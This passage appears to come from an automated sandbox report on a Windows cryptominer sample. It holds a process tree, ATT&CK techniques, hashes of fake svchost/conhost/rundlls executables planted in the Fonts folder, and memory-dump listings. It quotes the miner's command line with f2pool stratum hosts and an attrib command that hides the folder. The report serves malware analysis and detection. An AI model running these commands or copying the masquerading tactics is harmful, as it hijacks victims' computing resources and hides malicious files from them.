"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2640

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
1⤵
PID:3672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3756

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
215B

MD5
535a478cc80a0fbbf990eed73f8788bb

SHA1
459479dadaf00f3fa0de78f640c34dd426fd61aa

SHA256
323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51

SHA512
3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1

Download Submit
C:\Windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
C:\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\TEMP\csonhost.bat
Filesize
6KB

MD5
9da29265b1391c18f00c959c64b3fb65

SHA1
dee2f9ded1706933f452ebcd2d5ccd8818af713e

SHA256
fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824

SHA512
6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2

Download Submit
\??\c:\windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
\??\c:\windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
memory/232-153-0x0000000000000000-mapping.dmp

Download
memory/236-205-0x0000000000000000-mapping.dmp

Download
memory/520-134-0x0000000000000000-mapping.dmp

Download
memory/564-190-0x0000000000000000-mapping.dmp

Download
memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1044-220-0x0000000000000000-mapping.dmp

Download
memory/1088-201-0x0000000000000000-mapping.dmp

Download
memory/1188-200-0x0000000000000000-mapping.dmp

Download
memory/1216-139-0x0000000000000000-mapping.dmp

Download
memory/1340-141-0x0000000000000000-mapping.dmp

Download
memory/1528-179-0x0000000000000000-mapping.dmp

Download
memory/1644-154-0x0000000000000000-mapping.dmp

Download
memory/1744-144-0x0000000000000000-mapping.dmp

Download
memory/1764-227-0x0000000000000000-mapping.dmp

Download
memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1764-161-0x0000000000000000-mapping.dmp

Download
memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2088-137-0x0000000000000000-mapping.dmp

Download
memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2164-164-0x0000000000000000-mapping.dmp

Download
memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2212-197-0x0000000000000000-mapping.dmp

Download
memory/2348-165-0x0000000000000000-mapping.dmp

Download
memory/2464-203-0x0000000000000000-mapping.dmp

Download
memory/2536-150-0x0000000000000000-mapping.dmp

Download
memory/2640-238-0x0000027062C60000-0x0000027062CA0000-memory.dmp

Filesize
256KB

Download
memory/2640-235-0x0000027062B10000-0x0000027062B30000-memory.dmp

Filesize
128KB

Download
memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2664-159-0x0000000000000000-mapping.dmp

Download
memory/2712-147-0x0000000000000000-mapping.dmp

Download
memory/2716-149-0x0000000000000000-mapping.dmp

Download
memory/2748-146-0x0000000000000000-mapping.dmp

Download
memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2888-206-0x0000000000000000-mapping.dmp

Download
memory/3036-195-0x0000000000000000-mapping.dmp

Download
memory/3132-160-0x0000000000000000-mapping.dmp

Download
memory/3380-219-0x0000000000000000-mapping.dmp

Download
memory/3392-138-0x0000000000000000-mapping.dmp

Download
memory/3404-217-0x0000000000000000-mapping.dmp

Download
memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/3520-133-0x0000000000000000-mapping.dmp

Download
memory/3540-157-0x0000000000000000-mapping.dmp

Download
memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3544-211-0x0000000000000000-mapping.dmp

Download
memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3676-213-0x0000000000000000-mapping.dmp

Download
memory/3692-156-0x0000000000000000-mapping.dmp

Download
memory/3744-170-0x0000000000000000-mapping.dmp

Download
memory/3756-202-0x0000000000000000-mapping.dmp

Download
memory/3808-142-0x0000000000000000-mapping.dmp

Download
memory/3904-185-0x0000000000000000-mapping.dmp

Download
memory/3936-152-0x0000000000000000-mapping.dmp

Download
memory/4056-178-0x0000000000000000-mapping.dmp

Download
memory/4072-182-0x0000000000000000-mapping.dmp

Download
memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/4092-191-0x0000000000000000-mapping.dmp

Download
memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4184-140-0x0000000000000000-mapping.dmp

Download
memory/4248-135-0x0000000000000000-mapping.dmp

Download
memory/4328-199-0x0000000000000000-mapping.dmp

Download
memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4440-221-0x0000000000000000-mapping.dmp

Download
memory/4572-204-0x0000000000000000-mapping.dmp

Download
memory/4584-136-0x0000000000000000-mapping.dmp

Download
memory/4688-155-0x0000000000000000-mapping.dmp

Download
memory/4720-188-0x0000000000000000-mapping.dmp

Download
memory/4764-145-0x0000000000000000-mapping.dmp

Download
memory/4840-193-0x0000000000000000-mapping.dmp

Download
memory/4844-189-0x0000000000000000-mapping.dmp

Download
memory/4848-169-0x0000000000000000-mapping.dmp

Download
memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4900-194-0x0000000000000000-mapping.dmp

Download
memory/4920-198-0x0000000000000000-mapping.dmp

Download
memory/4928-192-0x0000000000000000-mapping.dmp

Download
memory/4948-143-0x0000000000000000-mapping.dmp

Download
memory/4984-167-0x0000000000000000-mapping.dmp

Download
memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4996-224-0x0000000000000000-mapping.dmp

Download
memory/5024-148-0x0000000000000000-mapping.dmp

Download
memory/5056-151-0x0000000000000000-mapping.dmp

Download
memory/5100-207-0x0000000000000000-mapping.dmp

Download
memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download